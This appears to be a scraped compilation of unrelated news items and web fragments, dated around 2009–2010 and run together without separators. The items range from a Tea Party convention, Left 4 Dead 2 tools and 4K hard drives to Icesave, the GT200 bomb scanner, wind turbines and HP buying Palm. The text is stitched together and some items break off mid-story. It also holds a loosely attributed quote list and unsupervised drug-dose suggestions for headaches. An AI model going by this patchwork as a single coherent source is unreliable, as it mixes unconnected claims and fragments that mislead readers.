The rise of conservative media outfits like Breitbart ’s Big Journalism [ bigjournalism.com ] and Big Government and Tucker Carlson ’s The Daily Caller [ thedailycaller.com ] have offered a kind of counter - media that , in Breitbart ’s view , tells the stories that the mainstream media wo n’t tell Americans – including that of the nascent tea party movement , which has grown largely by Twitter , Facebook and via blogs like Glenn Reynolds ’ Instapundit [ instapundit.com ] .
Technology the great equalizer
“ Technology has been a great equalizer , ” says Judson Phillips , founder of the Tea Party Nation website , a sort of tea party Facebook that sponsored this weekend convention .
“ It reminds me of how the British used old - style tactics and the patriots would be behind the trees , shooting . ”
In a fiery speech to the first - ever National Tea Party Convention on Saturday , Breitbart – who runs his counter - media empire from his basement office in Hollywood – painted a vivid picture of a press in lockstep with liberal values , where reporters use words like racist and homophobe as weapons to suppress dissent .
( At that point , a woman wearing a t - shirt that said “ I resist ” stood up and waved . )
Breitbart said reporters put all news involving conservatives into two basic buckets : " racism and Watergate . "
He urged the 600 tea party activists gathered at the Opryland resort in Nashville to take inspiration from conservative reporters like James O'Keefe , the videographer behind the undercover ACORN expose .
" I 'm trying to tell you , wink , you can do it , too .
You have cameras !
You have ingenuity ! " he said .
“ What we are starting to do is create our own media … that is reporting what the mainstream media refuses to tell you .
We are exposing the corruption of the mainstream media . ”
Breitbart ’s may have a point .
Proof to many here is how the mainstream media for weeks missed the story of Scott Brown ’s surging candidacy in Massachusetts ( one likely reason for all the interest in the Tea Party Convention ) , or how the New York Times put Mr. O’Keefe on page 1 only after he was arrested for alleged phone - tampering at Sen.
Mary Landrieu ’s office in New Orleans .
Jabs at the mainstream media
But while the roomful of tea partiers stood up at several of Breitbart 's jabs and pointed to the TV cameras at the back of the room , the fact that there were TV cameras there at all partly undermined Breitbart ’s point that mainstream reporters are totally out of touch .
Convention organizers realized it , too .
After originally banning all but a few mostly conservative outlets , the organizers ultimately opened the convention doors wide , even allowing media into Sarah Palin ’s speech tonight .
True , some of the ensuing coverage has been critical and snide .
But the willingness of people like California tea party activist Heather Gass to speak her mind to mainstream reporters may do as much , or more , to legitimize the tea party movement as the counter - media ’s attention .
" People can now see who we are and they can see that we ’re not dangerous , ” says Ms. Gass .
“ We ’re their neighbors . ”
Not everyone agrees .
One caller to C - Span – which aired nearly the entire convention – said the sight of primarily white and older self - described “ patriots ” frightened her .
She said the gathering looked like a lynch mob .
But the fact is that the 200 - plus old - school reporters attending the convention is giving the potent but inchoate movement something it craves and , ultimately , needs : respect .
That includes a Swedish radio reporter who sent an earnest piece back to Sveriges Radio on Friday , explaining how a modern - day tax revolt movement that appeared at first to be woefully fringe is looking more and more mainstream .
-----
Follow us on Twitter .
December 23 , 2009 - Yasser Malaika
We are releasing the Left 4 Dead 2 Authoring Tools and Left 4 Dead 2 Add - on Support today .
PLAYERS : If you are not looking to design but play custom campaigns all you need to do is install the add - on support package .
Just go into steam and open up thetab .
Look for the entry labeledclick and install it .
This download is sizable , but will update your L4D2 installation to allow running ANY map , including custom maps made for the original .
Once installed , you do not need to run this application , it will always be active .
We will be updating the Left 4 Dead 2 game UI to include links to this package when applicable but for now please just download it directly .
If you see any missing textures or models from your favorite map let us know in the forums .
DESIGNERS : Besides also downloading the above file you will need to download the .
Downloading it will add applications , utilities , and example files that are useful for building L4D2 game add - ons .
These are similar to the tools released for Left 4 Dead , but include many updates and new features .
Among the most useful are : Gamemode Logic : Designers can now make a single map that can behave differently depending on the gamemode in which it is being played .
This can dramatically reduce the file size of Campaign add - ons , as the same map can be used for Co-op , Versus , Scavenge , and Survival .
Director Logic : Maps can now alter their layout and behavior depending on how " angry " the A.I. director is .
The better the Survivors are doing , the angrier the AI Director seems to get .
This allows you to base variable paths and other events on the player 's skill and current conditions .
Scavenge Mode Support !
All the elements map authors need to support Scavenge in their maps .
This includes game props as well as a full example in the form of Deadline 2 , an updated tutorial campaign .
We have included an updated tutorial to help you get going and as always you can join the discussion on the map designer email list .
What we want for New Years is to get to play your custom maps in Left 4 Dead 2 .
For the best user experience and to take advantage of the new map and nav mesh formats , Left 4 Dead 1 Map Makers will want to compile Left 4 Dead 2 specific versions of their map in the new tool .
Happy Holidays , The Left 4 Dead 2 Team
By Mark Ward
technology correspondent , BBC News
Windows 7 is one of few operating systems that are " 4 K aware "
Hard drives are about to undergo one of the biggest format shifts in 30 years .
By early 2011 all hard drives will use an " advanced format " that changes how they go about saving the data people store on them .
The move to the advanced format will make it easier for hard drive makers to produce bigger drives that use less power and are more reliable .
However , it might mean problems for Windows XP users who swap an old drive for one using the changed format .
Error codes
Since the days of the venerable DOS operating system , the space on a hard drive has been formatted into blocks 512 bytes in size .
The 512 byte sector became standardised thanks to IBM which used it on floppy disks .
While 512 bytes was useful when hard drives were only a few megabytes in size , it makes less sense when drives can hold a terabyte ( 1000 gigabytes ) , or more of data .
The 512 byte format dates from the days of the floppy " The technology has changed but that fundamental building block of formatting has not , " said David Burks , a product marketing manager for storage firm Seagate .
This fine resolution on hard drives is causing a problem , he said , because of the wasted space associated with each tiny block .
Each 512 byte sector has a marker showing where it begins and an area dedicated to storing error correction codes .
In addition a tiny gap has to be left between each sector .
In large drives this wasted space where data cannot be stored can take up a significant proportion of the drive .
Moving to an advanced format of 4 K sectors means about eight times less wasted space but will allow drives to devote twice as much space per block to error correction .
" You can get yourself into a corner where you cannot squeeze much more onto the disk , " said Steve Perkins , a technical consultant for Western Digital .
This shift also allows manufacturers to make more efficient use of the real estate on a hard drive .
" We can put more data on the disk , " he said .
" It 's about 7 - 11 % more efficient as a format . "
Slow down Through the International Disk Drive Equipment and Materials Association ( Idema ) all hard drive makers have committed to adopting the 4 K advanced format by the end of January 2011 .
Hard drive makers have begun an education and awareness campaign to let people know about the advanced format and to warn about the problems it could inflict on users of older operating systems such as Windows XP .
This is because Windows XP was released before the 4 K format was decided upon .
" The 512 byte sector assumption is ensconced into a lot of the aspects of computer architecture , " said Mr Burks from Seagate .
By contrast , Windows 7 , Vista , OS X Tiger , Leopard , Snow Leopard and versions of the Linux kernel released after September 2009 are all 4 K aware .
To help Windows XP cope , advanced format drives will be able to pretend they still use sectors 512 bytes in size .
When reading data from a drive this emulation will go unnoticed .
However , said Mr Burks , in some situations writing data could hit performance .
In some cases the drive will take two steps to write data rather than one and introduce a delay of about 5 milliseconds .
" All other things being equal you will have a noticeable hard drive reduction in performance , " said Mr Burks , adding that , in some circumstances , it could make a drive 10 % slower .
In a bid to limit the misalignment , hard drive makers are producing software that ensures 512 sectors line up with 4 K ones .
Those most likely to see the performance problems are those building their own computers or swapping out an old drive for one that uses the new format .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Ten years ago , investors knew that technology would change the world , and they were right .
But you can be 100 % right about the future and end up with zero to show for it if you overpay in the first place .
On March 10 , 2000 , the Nasdaq Composite index closed at a record of 5048.62 , up 24 % since the beginning of the year , after an 86 % gain in 1999 .
And many were calling for the Nasdaq to hit 6000 within a year or two .
It ...
The White Stripes said the ad would help " a war that we do not support " Rock band The White Stripes are taking on the US Air Force , complaining that it used one of the group 's songs in a TV advert without permission .
In a statement on their website , the duo said they took " strong insult and objection " to the use of the tune in an ad during the Super Bowl on Sunday .
Their hit Fell In Love With A Girl was re-recorded for the commercial for the Air Force Reserve , the group claim .
They said they will " take strong action to stop the ad containing this music " .
The statement said : " We believe our song was re-recorded and used without permission of the White Stripes , our publishers , label or management .
We simply do n't want to be a cog in the wheel of the current conflict
Jack White " The White Stripes take strong insult and objection to the Air Force Reserves presenting this advert with the implication that we licensed one of our songs to encourage recruitment during a war that we do not support .
" The White Stripes support this nation 's military , at home and during times when our country needs and depends on them .
" We simply do n't want to be a cog in the wheel of the current conflict , and hope for a safe and speedy return home for our troops . "
The ad was part of a recruiting campaign for the Air Force Reserve , whose 67,000 members back up the main Air Force .
Its personnel are involved in missions in Iraq and Afghanistan as well as other operations such as supporting the relief effort after the earthquake in Haiti .
The Air Force Reserve were unavailable for comment .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
AUSTRALIA'S fleet of 15 F - 111 strike bombers has been grounded after an engine fire forced one aircraft to make an emergency landing in Singapore last week .
The aircraft was performing a flying display at the Singapore Air Show on February 4 when on - board instrumentation indicated an engine fire , although no fire was visible to air traffic control .
" In the interests of safety , the pilot terminated the display , completed his safety checklist , declared a mayday and landed without incident at Changi Air Base East , " a defence spokesman said .
" Air Force takes flight safety very seriously .
The aircrew handled this incident swiftly and decisively . "
An inspection of the aircraft revealed some fire damage in the left hand engine .
The spokesman said the RAAF had started an investigation into the incident .
" In accordance with Air Force 's commitment to safety , all F - 111 flying has been temporarily suspended while the cause of the incident is determined , " he said .
Originally published as F - 111s grounded after engine fire
( CNN ) -- Iceland 's voters overwhelmingly rejected a deal to pay billions of dollars it owes to the United Kingdom and the Netherlands , the Foreign Ministry said Sunday .
With around 90 percent of votes counted , just over 93 percent said no and just under 2 percent said yes .
Not enough votes remain to be counted to change the result .
Some 62.5 percent of Iceland 's roughly 200,000 register voters cast ballots , the ministry said .
The referendum was on a law about repaying the Netherlands and UK , which helped savers in their own countries who lost money in a failed Icelandic Internet bank .
The British and Dutch governments came up with more than $ 5 billion for bailing out people who lost money in Icesave -- an online retail bank branch of Landsbanki .
That Icelandic bank failed in October 2008 , along with two other banks in the country .
Under a European Union directive , Iceland now owes compensation to Britain and the Netherlands .
The Icelandic government has said it will honor its international obligations .
Iceland 's parliament passed a bill authorizing a state guarantee for repayment of the funds , but President Olafur Ragnar Grimsson declined to sign it in January .
He cited public disapproval , and in particular , an Internet petition signed by up to one - quarter of the electorate , as a reason for not signing the bill .
He said there needed to be a national consensus in addressing the issue .
That prompted Saturday 's national referendum on the law .
The Icelandic public widely disapproved of the deal , the government said in a fact sheet on the deal .
" There is widespread frustration over the claim on ordinary citizens in Iceland to pay the price for the irresponsible behavior of reckless bankers , " it said .
Magnus Arni Skulason , who campaigned against the bill , called the terms of the loan repayment unacceptable .
" Of course we feel empathy for those people that lost money , " he said Saturday while voting was going on .
" We just want to get a more reasonable agreement , " he told CNN .
It is not clear what happens now that voters have said no to the loan guarantees .
The International Monetary Fund loaned Iceland $ 2.1 billion in November , and said repaying the money to the British and Dutch governments was a requirement of the loan .
Iceland has begun moves toward applying for European Union membership , which Britain and the Netherlands could block .
Britain spent £ 2.3 billion ( $ 3.69 billion ) last year to cover the losses that British savers incurred when Icelandic banks collapsed .
The Dutch government spent € 1.3 billion ( $ 1.87 billion ) to cover bank losses in the country .
The Icelandic government said it has " clearly stated its intention to honor its international obligations and remains fully committed to implementing the bilateral loan agreements with the UK and the Netherlands . "
Headaches From Sex : Coital Cephalgia What Are Sex Headaches ( Coital Cephalgia ) Like ?
Who Gets
Them ?
Sex headaches can occur around either masturbation or any kind of sex .
There have even been incidents where getting into position has caused them .
They are rare , only one out of 360 headaches ( not people but people with headaches ) are sex headaches .
The vast majority are benign , although a few are signs of other medical problems ( see below ) .
They are part of a bigger phenomenon called exertional headaches -- those caused by exercise .
Men and women have the same rates of exertional headaches in general .
But , men have higher rates of sex headaches specifically .
This is the opposite of what you might expect , as women have more headaches in general .
Estronaut was not able to find the exact reason for this .
It could be due to the fact that men are more likely to be the more active partner , more likely to have an orgasm from sex , or masturbate more than women .
Women who are more likely to get them are : over 40 , have recently started an exercise program , or have migraines or tension headaches already .
There has been some evidence that the 6 weeks after childbirth are also high risk times .
If a woman does have previous headache problems , her sex headaches will be of the same type .
They vary greatly from woman to woman .
They are divided into three basic types .
There are the early , mild headaches , that are short - lasting .
There are orgasmic headaches , that are more sudden and severe .
These may or may not go into post - coital headaches that last for up to a day .
This last type can occur by itself as well .
Sex headaches are usually felt at the base of the skull , but can be all over .
The pain can be mild to exploding .
They do not occur with every sex act .
Some people go for years between episodes .
What Causes Sex Headaches ( Coital Cephalgia ) ?
Is There Something Serious Wrong ?
Obviously , sex raises the blood pressure .
This in turn raises the pressure in the head .
Also , sex causes muscle tightening and tension .
Sex headaches are a combination of the blood pressure and muscle tension , for most people .
Some cases have been found where there is low pressure of the fluid around the brain and spine .
In rare instances , sex headaches unveil underlying medical problems .
These include : meningitis , bleeding in the skull , aneurysm , tumors , strokes , and various enodcrine disorders .
The more severe the pain is and the more the woman has other symptoms ( tingling , weakness , numbness , changes in her vision , disorientation ) the more she should consider seeing her doctor .
The doctor will review all her symptoms and neurological signs in the office .
If necessary , she may go for a CAT scan or an MRI .
A spinal tap is done rarely .
Prevention And Treatment
Once they occur , the treatments are much the same as any headaches .
Again , migraine suffers will likely have a migraine and will want to use their fiorinal , or esgic .
Any caffiene based medications or anti-inflammatories ( naproxen , ibuprofen ) can be tried .
Cold compresses , and lying in a dark and quiet room can also help .
To prevent them , abstinence works , but will have few takers .
Switching to a less active position or role also works .
But many women are already on the bottom and those who are n't do n't want to give it up .
Common , non-narcotic pain relievers , such as naproxen ( 500 mg ) or anaprox ( 550 mg ) taken an hour or two before sex can prevent some sex headaches .
Ibuprofen ( at least 400 mg or more ) can also work .
Propranolol , a blood pressure reducing drug has also been used .
About 40 mg can be given on a regular basis or a couple of hours before sex .
Migraine suffers use their ergotamine .
Some people try plain old aspirin .
With sex headaches , the woman 's anxiety level and feelings about the relationship may be an issue .
If there are problems here , she and / or her partner should seek counseling .
If all else fails , then just wait .
Sex headaches often go away on their own in a matter of weeks or months .
Rate this article : ( 1=lowest , 5 =highest ) 1 2 3 4 5
Bangkok , Thailand ( CNN ) --
A bomb scanner sold to dozens of countries around the world has been shown to be useless at detecting explosives , the Thai government said , raising the possibility that thousands of lives have been lost to bomb attacks because of ineffective screenings .
The Thai government announced Tuesday that the GT200 failed rigorous tests carried out by scientists and the army in Thailand , after concerns were raised that the device was an elaborate hoax .
" We 've done a double - blind test where the equipment was only successful in discovering in 20 percent of the cases , when just a random choice would give you 25 percent -- so there 's no statistical significance to having the equipment , " Thai Prime Minister Abhisit Vejjajiva told CNN .
The device 's manufacturer , Britain - based Global Technical , disputed the tests ' results .
Thailand has spent more than $ 20 million for about 700 of the devices , which are supposed to indicate the presence of explosives .
Thailand also has paid for the manufacturer 's eight days of training for device operators .
After the test results , the Thai government said it was looking into the possibility of legal action against Global Technical .
The Thai army has been using GT200 for six years in the country 's troubled south , where insurgents have been waging a years - long secessionist movement , and where bomb attacks occur weekly .
The device also has been sold to Thailand 's forensic scientists , navy , air force , narcotics control board and police .
Global Technical said in an e-mail it was " surprised and disappointed by the reported outcome of tests carried out by the Thai government . "
It said the results were " completely at odds with other tests carried out by independent bodies " and with " the experience of the large number of users of this product all over the world .
" We shall not be commenting further until we have seen the report and have had the opportunity to study it and , in particular , to understand the testing methodology employed . "
Global Technical and its
Thai distributor , Avia Satcom , both declined CNN 's request for an interview .
The company 's Web site says the device has been sold to 30 countries around the world .
Some of the countries thought to have purchased the units are the Philippines , Mexico and Kenya .
The British government has banned a similar device , the ADE651 , made by British firm ATSC , from being exported .
The managing director of ATSC , Jim McCormick , has been arrested and questioned by police , who alleged " suspicion of fraud . "
The company declined to comment , citing ongoing legal action .
The ADE651 has been sold in Iraq and Afghanistan , although the Iraqi army has stopped using it .
Both the ADE651 and the GT200 use technology that some scientists dismiss as little more than a car antenna mounted on a plastic box that is designed to act much the way a dowsing rod is used to find water .
" I can see no mechanism of a detecting nature whatsoever , except for the brain of the person who is holding it , " said Sidney Alford , an explosives engineer .
" There is no electronic [ component ] , " he said .
" I would expect there to be some sort of electronic device if a person had told me this works .
I would expect to see electronic components here . "
The deputy head of a Polish Church has been killed in a car accident returning home from funeral ceremonies for President Lech Kaczynski , the church said .
In a statement on its website , the church said Bishop Mieczyslaw Cieslar ( 60 ) died last night near the city of Lodz .
Mr Kaczynski died in a plane crash on April 10 in Russia .
Police confirmed the car crash but no more details were released .
Belfast Telegraph
Researchers at the Georgia Tech University Research Institute , in collaboration with California - based PAX Streamline , are working on a new wind blade design that could mean more energy efficiency and lower costs with help from a $ 3 million grant from the Advanced Research Projects Agency - Energy , or ARPA-E .
Bob Englar , principal research engineer at the Georgia Tech institute , is working on a blade using circulation control technology to create more power using a smaller blade .
He got the notion from something called the “ Coanda Effect , ” which says a moving gas or liquid stream from a jet will flow along the shape of a surface , even if it curves or bends , instead of continuing to move in a straight line out of the jet .
The Coanda Effect can also increase wind turbine efficiency and electricity production by increasing the lift to the wind turbine blades .
The hope is that , even in places with little to no wind available , redesigned blades could generate the same amount of wind power with the same efficiency and at lower costs compared with more common wind turbines by using less wind .
Making It Work
Englar said he had been perfecting the design for more than 40 years while working on U.S. Navy aircraft , including helicopters , airplanes and jets .
Englar said the blade design works just like a helicopter ’s rotors but in reverse .
( Left : Trailing edge of the circulation control airfoil in research tunnel with cotton strings showing flow patterns .
This trailing edge affords high lift generation and drag control .
Photo courtesy GTRI and NASA . )
“ When you put wind in a rotor blade , it turns the blade that turns the turbine that creates power , ” Englar said .
Unlike with a chopper blade , which turns the power into lift , the turbine blade turns lift into power .
Preliminary tests show the blades could produce 30 to 40 percent more power than conventional blades at the same speed .
“ If I can generate a 40 percent power increase , then I can use some of that ( leftover power ) toward the compressor , ” Englar said .
More Good Ideas ?
Georgia
Tech is not the only university coming up with a new wind blade design .
Dr. Majid Rashidi , chairman of the Engineering Technology Department and Betty L. Gordon distinguished professor of the Mechanical Engineer Department at Cleveland State University , is also working on a new wind turbine design with support from the U.S. Department of Energy .
Rashidi ’s design includes incorporating four wind turbines on a cylindrical structure and placing it on a building ’s rooftop .
Test results show a Rashidi - designed turbine with a 15 - foot diameter cylinder and a wind speed of 18 mph produced about 1,580 Watts , while a turbine with a more conventional general design produced 580 Watts of energy .
At Georgia Tech , Englar is working to change the wind blade ’s lift coefficient by blowing pressurized air out of thin slots on the back side of the blade .
This is done to change the angle of attack without having to twist the blade .
“ Think of a plane going down the runway for take off , ” Englar said .
“ The pilot increases the angle of attack by pulling back on the stick .
It increases the lift coefficient and the plane takes off . ”
A second way to get the technology to work is to change the area of the blade by changing the length of the “ chord , ” which is the distance from the blade ’s front to its back .
“ When the blade is rotating , each section is going at a different speed because of the radius , ” Englar said .
“ Different speeds mean a different outboard of the chord , which means a different angle of attack for each section . ”
Englar said doing that requires finding the correct rotation for the blades .
The biggest problem is trying to get wind turbines with these new blades to generate the same amount of power at lower speeds , such as in parts of the United States where the wind does not blow very strongly .
“ It turns out these can generate up to 10 times the lift coefficient and I do n’t need the angle of attack to do it , ” Englar said .
That would be similar to a plane taking off without the pilot having to pull back on the stick .
“ If I can increase the lift coefficient by 10 , I only have to change the blowing or make it give me the same torque at a lower wind speed . ”
Englar said he could get the lift by turning on the blowing or getting the same amount of torque at a lower wind speed , creating the ability to run the wind turbine in places where they could not be run because of a lack of wind .
But how do you get the right amount of power to create the blowing needed to make a wind turbine turn without a lot of energy ?
“ With planes , they have jet engines , but turbines do n’t have jet engines , so I have to come up with something that takes a little air and gives out power , ” Englar said .
The solution came by designing an airflow section that requires a minimum amount of blown airflow while producing the same amount of power .
Business Case
PAX CEO John Webley said the research and development of the Georgia Tech project could help get one of the redesigned turbines on the market in a short amount of time .
“ This is a significant validation of our established turbine R&D , ” said Webley .
With the help of the DOE grant , the company expects to rapidly accelerate its research program and , within the next two years , deploy a prototype wind turbine .
Englar said the technology could easily be applied to hydropower developments and has already been tested on semi trucks to test vehicle fuel efficiency by reducing drag .
“ The pressure was less than 1/ 4 psi , ” Englar said .
“ It shows you do n’t need a huge amount of psi to put out power . ”
No matter where the technology is used , Englar and PAX hope it can help the country at a time it is looking for ways to save more energy .
“ I ’m looking at ways to generate an economic and efficient device , ” Englar said .
Sidebar : Toward a 10 MW Wind Turbine
The wind energy industry is in a rapid phase of change , growth , expansion and shifting market demands .
The wind business is poised for growth , but at the same time has financial resource limitations .
These factors lead to a climate of investment uncertainty and if there ’s anything we ’ve learned from history it is that investment uncertainly leads to economic uncertainty , which leads to further political uncertainty .
A great new resource is being unveiled that will propel the wind power industry to a new dimension :
The mega turbine .
Remember , we all started with 100 kW systems , then grew to 660 kW turbines .
Recently we ’ve jumped from 1 MW to 2 MW , 2.5 MW and then 3 MW turbines on 90 meter towers .
Say hello to the new age of mega turbines : 10 MW wind turbines on a 100 meter tower .
This new machine has a rotor diameter of 150 meters .
One of the first 10 MW wind turbines is being developed by Clipper Windpower , Carpentaria , CA , and is in R&D development in Scotland .
Called “ Brittania ” it is scheduled to debut in 2012 .
Dilip Khatri , senior structural engineer with URS , spoke with Jim Dehlsen , founder of Clipper Wind .
Q. What prompted the development of the 10MW Turbine ?
A . The 10 MW turbine is a natural progression from our previous turbine sizes and brings together “ scalability ” for wind farms .
The total development , operations and maintenance cost for 10 wind towers remains relatively constant , irrespective of the size of turbine .
So the larger the turbine , the more power is generated and the cost of energy production is reduced because of the spread of these operational and development costs .
Q . What market will this turbine serve and what is the expected capacity factor ?
A. Primarily offshore and near - shore markets .
We expect an average capacity factor of 40 percent , although this depends on the wind regime .
Q . What is one of the key innovations in the Brittania ?
A. Distributed generation , which is an innovation stemming from the Liberty Turbine .
The Brittania will have four generators so as to avoid any service interruption cost .
When a single generator is down , another generator will pick up the power delivery demand .
The turbine is equipped with an onboard crane system to provide onboard access for machinery , equipment repair and serviceability .
Q . What type of global certifications are you pursuing in the final product delivery ?
A . We are obtaining both Germanischier Lloyd and DNV Certifications .
This will give us global acceptance for a worldwide market .
Q. Tell us about the investment from United Technologies .
A. United Technologies has bought a 49 percent share in Clipper , approximately $ 249 million , and is now a key partner in our success .
We are pleased to have United Technologies as our partner because they bring a wealth of technology experience in Sikorsky Helicopters , cranes , and an assortment of manufacturing expertise to our team .
Q. What about the tower and foundation infrastructure ?
A. Clipper is still researching this technology and examining various design solutions for 100 meter towers in different water depths .
PARIS ( Reuters ) - Prominent Muslim scholars have recast a famous medieval fatwa on jihad , arguing the religious edict radical Islamists often cite to justify killing cannot be used in a globalized world that respects faith and civil rights .
A conference in Mardin in southeastern Turkey declared the fatwa by 14th century scholar Ibn Taymiyya rules out militant violence and the medieval Muslim division of the world into a “ house of Islam ” and “ house of unbelief ” no longer applies .
Osama bin Laden has quoted Ibn Taymiyya ’s “ Mardin fatwa ” repeatedly in his calls for Muslims to overthrow the Saudi monarchy and wage jihad against the United States .
Referring to that historic document , the weekend conference said : “ Anyone who seeks support from this fatwa for killing Muslims or non-Muslims has erred in his interpretation .
“ It is not for a Muslim individual or a Muslim group to announce and declare war or engage in combative jihad ... on their own , ” said the declaration issued Sunday in Arabic and later provided to Reuters in English .
The declaration is the latest bid by mainstream scholars to use age - old Muslim texts to refute current - day religious arguments by Islamist groups .
A leading Pakistani scholar issued a 600 - page fatwa against terrorism in London early this month .
Another declaration in Dubai this month concerned peace in Somalia .
Such fatwas may not convince militants , but could help keep undecided Muslims from supporting them , the scholars say .
The Mardin conference gathered 15 leading scholars from countries including Saudi Arabia , Turkey , India , Senegal , Kuwait , Iran , Morocco and Indonesia .
Among them were Bosnian Grand Mufti Mustafa Ceric , Sheikh Abdullah bin Bayyah of Mauritania and Yemeni Sheikh Habib Ali al - Jifri .
RULE FOR MUSLIM RADICALS
Ibn Taymiyya ’s Mardin fatwa is a classic text for militants who say it allows Muslims to declare other Muslims infidels and wage war on them .
The scholars said this view had to be seen in its historic context of medieval Mongol raids on Muslim lands .
But the scholars said it was actually about overcoming the old view of a world divided into Muslim and non-Muslim spheres and reinterpreting Islam in changing political situations .
The emergence of civil states that guard religious , ethnic and national rights “ has necessitated declaring the entire world a place of tolerance and peaceful co-existence between all religious , groups and factions , ” their declaration said .
Aref Ali Nayed , a Libyan who heads the Dubai theological think - tank Kalam Research and Media , told the conference the great Muslim empires of the past were not a model for a globalized world where borders were increasingly irrelevant .
“ We must not be obsessed with an Islam conceived of only geographically and politically , ” he said .
“ Living in the diaspora is often more conducive to healthy and sincere Muslim living .
Empires and carved - out ‘ Islamic states ’ often make us complacent . ”
Nayed said Muslims must also understand that “ not all types of secularisms are anti-religious . ”
The United States has stayed religious despite its separation of church and state , but some “ French Revolution - like secularisms ” were anti-religious .
The declaration ended with a call to Muslim scholars for more research to explain the context of medieval fatwas on public issues and show “ what is hoped to be gained from a sound and correct understanding of their respective legacies . ”
Five same - sex couples were married today in Mexico City after a recent change to the city 's laws .
They are the first to have legally recognised same - sex weddings anywhere in Latin America .
The judge who witnessed four of the five marriages , Hegel Cortes , called it " an historic day " .
But the move has many opponents .
The Mexican law and the resulting marriages have ignited a storm of protest .
The Catholic Church is staunchly opposed .
So is the federal government , including president Felipe Calderon .
The attorney general has filed an appeal to stop the marriages , but Mexico 's federal courts rarely interfere in cases involving lower jurisdictions .
Homosexuality remains anathema throughout most of Latin America .
While one gay couple was married in Argentina last year , that marriage was quickly struck down by the courts .
Originally Posted by frimple Originally Posted by
Mon dieu !
If AIs go for their historical personalities fine , great , w/e .
But there really REALLY needs to be a ' random personalities ' option .
I do n't want ' Elisabeth II ' always dashing madly for the coast in pangea or indeed after a while anybody maintaining their traits because if I 'm going to get used to them very quickly .
One thing I really do n't want to have in Civ V is the situation where I 'm meeting AIs for the first time and going " * sigh * Mansu Musa , well I can see where this game is going for the next 2000 turns "
Hewlett Packard today announced that it is acquiring Palm for a cool $ 1.2 billion , or $ 5.70 per share of common stock .
The acquisition has been approved by the boards of both Palm and HP , but is subject to regulatory approval .
All of the regulatory wrangling is expected to be completed by the end of HP ’s third quarter which ends July 31 , 2010 .
Palm CEO John Rubinstein is expected to remain at the company in an undisclosed capacity .
From the wording within the press release , it appears as if webOS may live on .
Check out the full press release after the jump .
PALO ALTO , Calif. & SUNNYVALE , Calif. — ( BUSINESS WIRE ) — HP ( NYSE : HPQ – News ) and Palm , Inc. ( NASDAQ : PALM – News ) today announced that they have entered into a definitive agreement under which HP will purchase Palm , a provider of smartphones powered by the Palm webOS mobile operating system , at a price of $ 5.70 per share of Palm common stock in cash or an enterprise value of approximately $ 1.2 billion .
The transaction has been approved by the HP and Palm boards of directors .
The combination of HP ’s global scale and financial strength with Palm ’s unparalleled webOS platform will enhance HP ’s ability to participate more aggressively in the fast - growing , highly profitable smartphone and connected mobile device markets .
Palm ’s unique webOS will allow HP to take advantage of features such as true multitasking and always up - to - date information sharing across applications .
“ Palm ’s innovative operating system provides an ideal platform to expand HP ’s mobility strategy and create a unique HP experience spanning multiple mobile connected devices , ” said Todd Bradley , executive vice president , Personal Systems Group , HP .
“ And , Palm possesses significant IP assets and has a highly skilled team .
The smartphone market is large , profitable and rapidly growing , and companies that can provide an integrated device and experience command a higher share .
Advances in mobility are offering significant opportunities , and HP intends to be a leader in this market . ”
“ We ’re thrilled by HP ’s vote of confidence in Palm ’s technological leadership , which delivered Palm webOS and iconic products such as the Palm Pre .
HP ’s longstanding culture of innovation , scale and global operating resources make it the perfect partner to rapidly accelerate the growth of webOS , ” said Jon Rubinstein , chairman and chief executive officer , Palm .
“ We look forward to working with HP to continue to deliver industry - leading mobile experiences to our customers and business partners . ”
Under the terms of the merger agreement , Palm stockholders will receive $ 5.70 in cash for each share of Palm common stock that they hold at the closing of the merger .
The merger consideration takes into account the updated guidance and other financial information being released by Palm this afternoon .
The acquisition is subject to customary closing conditions , including the receipt of domestic and foreign regulatory approvals and the approval of Palm ’s stockholders .
The transaction is expected to close during HP ’s third fiscal quarter ending July 31 , 2010 .
Palm ’s current chairman and CEO , Jon Rubinstein , is expected to remain with the company .
Read
" Buy The Rumor , Sell The Fact " Peter Schiff
You can love your Country and not your Government
Jesse Ventura
" The Government Works for ME , I do not answer to them They Answer to ME "
Glenn Beck
" Tyranny will Come to Your Door in a Uniform "
Alex Jones
" The Government is not The Solution to our Problems , The Government is The Problem "
Ronald Reagan
" The price good men pay for indifference to public affairs is to be ruled by evil men . "
Plato
The world is a﻿ tragedy to those that feel , and a comedy to those that think ... Beppe Grillo
" The people should not fear the government for it is the government who should fear the people " UNKNOWN
" If You are looking for solutions to the world 's problems , look in the Mirror , You Are The Solution , You have the power as a human being on this planet " UNKNOWN
" They do n't control us , We empower them " UNKNOWN
" Serial Killers do on a Small Scale What Governments do on a large one ... "
Serial Killer Richard Ramirez
" When the people fear their government , there is tyranny ; when the government fears the people , there is﻿ liberty . "
Thomas Jefferson
If a law is unjust , a man is not only right to disobey , he is obligated to do so
Thomas Jefferson
Thomas Jefferson
“ True education makes you feel stupid .
It makes you realize you have so much more to learn . ”
Robert Kiyosaki
Robert Kiyosaki
" Those who give up their liberty for more security neither deserve liberty nor security .
" None are more hopelessly enslaved than those who falsely believe they are free . ” - Johann Wolfgang von Goethe
" Always trust someone who is seeking the truth , never trust someone who found it "
Jordan Maxwell
Last year saw an “ explosion ” of extremist groups and activism across the U.S. , the Southern Poverty Law Center says in a new report , “ Rage on the Right : The Year in Hate and Extremism . ”
The report , prepared by Mark Potok , director of SPLC ’s Intelligence Project , charts the meteoric rise of anti-immigrant vigilante groups , which grew by 80 percent last year , and the resurgence of “ patriot ” militias and related organizations after years of a lower profile .
Available on the center ’s web site , www.splcenter.org, the document features links to data on different types of groups .
“ The number of hate groups in America has been going up for years , ” the report says , “ rising 54 percent between 2000 and 2008 and driven largely by an angry backlash against non-white immigration and , starting in the last year of that period , the economic meltdown and the climb to power of an African American president . ”
The report highlights the reemergence of the Patriot movement and its associated militias – most dramatically associated with the 1995 bombing of the Oklahoma City federal building that left 168 people dead .
The Patriots , who see the federal government as the main enemy and emphasize anti-government conspiracy theories , had largely sunk from view by the early 2000s .
But in 2009 the number of groups surged nearly two and a half times , to a total of 512 , including 127 militias .
Signs of renewed violence emerging from the radical right include the murder of six law enforcement officers by right wing extremists since President Obama was inaugurated , the report says , while “ racist skinheads and others have been arrested in alleged plots to assassinate the nation ’s first Black president . ”
In an accompanying video , Potok cites a growing overlap between the tea party movement and militias and other Patriot groups .
